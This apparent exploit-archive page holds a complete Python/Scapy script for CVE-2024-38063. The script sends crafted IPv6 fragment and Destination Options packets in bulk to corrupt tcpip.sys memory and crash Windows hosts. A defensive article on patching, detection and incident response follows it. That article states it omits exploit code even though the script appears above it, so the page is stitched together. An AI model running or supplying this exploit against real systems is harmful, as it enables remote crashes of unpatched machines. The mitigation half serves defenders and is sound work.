Windows TCP/IP - RCE Checker and Denial of Service

Exploit Author: Photubias Analysis Author: www.bubbleslearn.ir Category: DoS Language: Python Published Date: 2024-08-28 
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service
# Date: 2024-08-07
# Exploit Author: Photubias
# Vendor Homepage: https://microsoft.com
# Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
# Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189
# Tested on: Windows 11 23H2 and Windows Server 2022
# CVE: CVE-2024-38063

import os, subprocess, re, time, sys

## Variables
sDstIP = 'fe80::78b7:6283:49ad:c565'        ## Placeholder
if len(sys.argv) > 1: sDstIP = sys.argv[1]  ## Please provide an argument
sDstMAC = '00:0C:29:55:E1:C8'               ## Not required, will try to get the MAC via Neighbor Discovery
iBatches = 20
iCorruptions = 20                           ## How many times do we want to corrupt the tcpip.sys memory per batch

try:
    print('--- Loading Scapy, might take some time ...')
    from scapy.config import conf
    conf.ipv6_enabled = False
    import scapy.all as scapy
    scapy.conf.verb = 0
except:
    print('Error while loading scapy, please run "pip install scapy"')
    exit(1)

import logging
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)

def selectInterface(): #adapter[] = npfdevice, ip, mac
    def getAllInterfaces(): 
        lstInterfaces=[]
        if os.name == 'nt':
            proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE)
            for bInterface in proc.stdout.readlines():
                lstInt = bInterface.split(b',')
                sAdapter = lstInt[0].strip(b'"').decode()
                sDevicename = lstInt[1].strip(b'"').decode()
                sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':')
                sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:]
                proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE)
                try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0]
                except: sIP = ''
                if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add
        else:
            proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE)
            for bInterface in proc.stdout.readlines():
                lstInt = bInterface.strip().split(b' ')
                try: 
                    if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', ''])
                except: pass
        return lstInterfaces
    
    lstInterfaces = getAllInterfaces()
    if len(lstInterfaces) > 1:
        i = 1
        for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID
            print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0]))
            i += 1
        #sAnswer = input('[?] Please select the adapter [1]: ')
        sAnswer='3'
    else: sAnswer = None
    if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i: sAnswer = 1
    iAnswer = int(sAnswer) - 1
    sNPF = lstInterfaces[iAnswer][0]
    sIP = lstInterfaces[iAnswer][1]
    sMAC = lstInterfaces[iAnswer][2]
    if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4]
    return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3])

def get_packets(iID, sDstIPv6, sDstMac=None):
    iFragID = 0xbedead00 + iID
    oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')])
    oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive'
    oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1)
    if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work
        oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1
        oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2
        oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3
    return [oPacket1, oPacket2, oPacket3]

def doIPv6ND(sDstIP, sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation
    sMACResp = None
    oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff')
    oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt)
    if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse:
        sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr
    return sMACResp

lstInt = selectInterface() ## NPF, IPv6, MAC, Name

sMAC = doIPv6ND(sDstIP, lstInt[0])
if sMAC: 
    print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}')
    sDstMAC = sMAC
elif sDstMAC != '':
    print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC))
else: 
    print('[-] Without a MAC address, this exploit will probably not work')

lstPacketsToSend = []
for i in range(iBatches):
    for j in range(iCorruptions):
        lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC)

## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better)
print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP))
## Verification first: "ICMPv6ParamProblem"
lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)
if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]: 
    print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP))
else: 
    input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue')
print('[i] Waiting 10 seconds to let the target cool down (more is better)')
time.sleep(10)
input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now')
########## Exploit
print('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3]))
scapy.conf.verb = 1
scapy.sendp(lstPacketsToSend, iface=lstInt[0])
print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash')


Windows IPv6 TCP/IP Vulnerability (CVE-2024-38063): Overview, Risks, and Mitigation

Summary: CVE-2024-38063 is a vulnerability in the Windows TCP/IP stack related to IPv6 processing (tcpip.sys). When exploited, malformed IPv6 packets that abuse extension headers and fragmentation can trigger memory corruption in affected Windows builds. The impact ranges from a remote denial-of-service (system crash / BSOD) to potentially more severe exploitation depending on the crash context and environment. Microsoft has published a security advisory and updates — administrators should prioritize patching and use defensive controls until systems are remediated.

Important safety note

This article intentionally omits exploit code and step‑by‑step packet‑crafting instructions. Providing or using exploit code outside of an authorized lab is unethical and illegal in many jurisdictions. The information below focuses on detection, mitigation, safe testing guidance, and incident response so defenders can protect networks and hosts.

Affected systems

According to vendor advisories and reported testing, impacted systems include certain Windows 10 and 11 builds and Windows Server releases prior to the fixed update. Administrators should consult Microsoft's advisory for the authoritative list and fixed build numbers. As a starting point, compare your OS build numbers against the published remediation releases.

Product General vulnerable range (example) Action
Windows 10 / 11 (Client) Builds prior to the security update (see MS advisory) Install Microsoft patch for your release channel; verify build >= fixed build
Windows Server (2016 / 2019 / 2022) Server builds prior to the fixes referenced in the advisory Install latest security updates and test in staging before production rollout

Why this vulnerability matters

  • Network-facing: The vulnerability is triggered by crafted IPv6 traffic and can be exploited remotely over networks that accept IPv6 packets.
  • Crash and beyond: At minimum the flaw can cause a remote denial-of-service (BSOD). Depending on memory layout and privilege boundaries, memory corruption issues sometimes escalate to code execution — so treat it as high risk.
  • Attack surface: IPv6 extension headers (Destination Options, Fragmentation) and reassembly logic increase attack surface; many security devices do not inspect or normalize IPv6 fragments thoroughly.

Immediate mitigation steps (defensive)

  • Patch first: Apply Microsoft’s security updates as the primary mitigation. Confirm that affected hosts are updated to the fixed build.
  • Inventory: Identify systems with IPv6 enabled and prioritize patching externally-facing servers and endpoints that accept IPv6 traffic.
  • Network controls: At the perimeter, consider blocking or rate-limiting unnecessary IPv6 traffic and specifically filter suspicious IPv6 fragmentation patterns where possible. If you do not use IPv6, consider controlled disablement (see host commands below).
  • Host hardening: Ensure host firewall rules block unwanted incoming IPv6 traffic; for servers that do not require IPv6 clients, restrict it to management networks only.
  • Monitoring: Increase logging and monitoring for unusual increases in IPv6 fragmented traffic and for kernel crashes referencing tcpip.sys.

How to identify vulnerable hosts (safe methods)

Use inventory and configuration queries rather than active exploitation. The following benign commands help you determine OS build and whether IPv6 is enabled on a host.

# PowerShell: Get OS build and version
Get-CimInstance -ClassName Win32_OperatingSystem | Select-Object Caption, Version, BuildNumber

Explanation: This PowerShell command queries WMI/CIM for the operating system and returns the user-facing name, the OS version, and the build number. Match the build number against Microsoft’s advisory to determine whether a host needs updating.

# PowerShell: Check whether IPv6 binding is enabled on network adapters
Get-NetAdapterBinding -ComponentID ms_tcpip6 | Select-Object -Property Name, Enabled

Explanation: Lists adapters and whether the IPv6 protocol binding (ms_tcpip6) is enabled. This helps prioritize hosts where IPv6 traffic could reach the TCP/IP stack.

Safe validation and lab testing

If you must validate behavior, perform all testing in an isolated, offline lab using cloned virtual machines and segmented test networks with no route to production or the public Internet. Do not test exploits on production systems or on networks you do not own/operate.

  • Create snapshots and backups so you can revert test VMs.
  • Use packet-capture appliances (tcpdump, Wireshark) to observe the traffic that triggers anomalous behavior; do not share captures publicly if they reveal exploit payloads.
  • Prefer vendor-provided proof-of-fix guidance and confirm remediation by verifying updated build numbers rather than exploiting the vulnerability.

Network detection strategies

Design monitoring to detect anomalous IPv6 fragmentation and extension-header usage rather than seeking a single signature. Recommended signals:

  • Spike in fragmented IPv6 packets being received by a host or across the network.
  • Packets containing unusual or repeated Destination Options extension headers.
  • Flows containing a high number of small fragments from the same source to many destinations.
  • Host telemetry showing kernel crashes referencing tcpip.sys or IPv6-related error messages in the System log.

Use IDS/IPS systems to detect or rate-limit suspicious IPv6 fragmentation patterns. Example high-level rules include rate-limiting fragmented IPv6 traffic and alerting on destinations seeing fragmented traffic with peculiar extension headers. Avoid signature rules that are overly specific to a particular exploit payload; attackers will vary payloads.

Host hardening: controlled IPv6 disablement (if appropriate)

If IPv6 is not required in your environment, you can disable IPv6 protocol bindings on specific adapters rather than removing kernel components. Use this approach with caution and test in staging first.

# PowerShell: Disable IPv6 protocol binding on an adapter named "Ethernet"
Set-NetAdapterBinding -Name "Ethernet" -ComponentID ms_tcpip6 -Enabled $false

Explanation: This command removes the IPv6 binding from a specific network adapter so the host will not process IPv6 traffic via that adapter. It is reversible — enable with -Enabled $true. Always test and document changes to avoid network disruption.

Investigating a suspected incident

  • Isolate the affected host from the network to prevent further exploitation.
  • Collect volatile data and network captures: memory dump, interface pcap, process lists. Use forensics best practices to preserve chain of custody.
  • Check Windows System Event logs for kernel crash entries and look for references to tcpip.sys or bugcheck codes. Example: search for Event ID entries around the time of a crash.
  • Analyze crash dumps using WinDbg (from Windows SDK): load the dump and run !analyze -v to get a stack trace and probable faulting module.
# Example WinDbg command sequence (after opening a kernel or complete memory dump)
!analyze -v
kv
lm vm tcpip

Explanation: These commands provide verbose analysis, a stack trace, and module listing (including tcpip.sys). Use them only on captured dumps in a controlled forensic process.

Patch management and long-term remediation

  • Deploy Microsoft security updates broadly and on a prioritized basis according to exposure (internet-facing servers first).
  • Use automated patch management with staged rollouts and rollback plans.
  • Validate remediation by confirming build numbers and by monitoring for the disappearance of suspicious fragment traffic and crash reports.
  • Update IDS/IPS signatures and firewall rules to cover known attack patterns and to implement rate-limits for unusual IPv6 fragment traffic.

Practical guidance for defenders

  • Maintain an accurate asset inventory and map which systems accept IPv6 traffic.
  • Harden network edge devices to inspect and normalize IPv6 fragments.
  • Educate SOC analysts to look for both networking anomalies (fragment spikes) and host indicators (tcpip.sys crashes) together — correlated signals reduce false positives.
  • Keep backups and recovery plans current to reduce business impact in the event of successful exploitation.

References and further reading

  • Microsoft Security Update Guide / CVE-2024-38063 advisory — consult Microsoft’s official guidance and fixed KB articles for your Windows channel.
  • CVE repository entries for context on severity and CVSS scoring.
  • Best-practice hardening guides for IPv6 from major vendors (Cisco, Juniper) and security communities about handling IPv6 fragmentation in enterprise environments.

Ethics and legal considerations

Attempting to exploit CVE-2024-38063 against systems you do not own or have explicit authorization to test is illegal and unethical. Use the information above to protect and harden systems, to perform authorized testing in isolated labs, and to guide incident response and mitigation activities.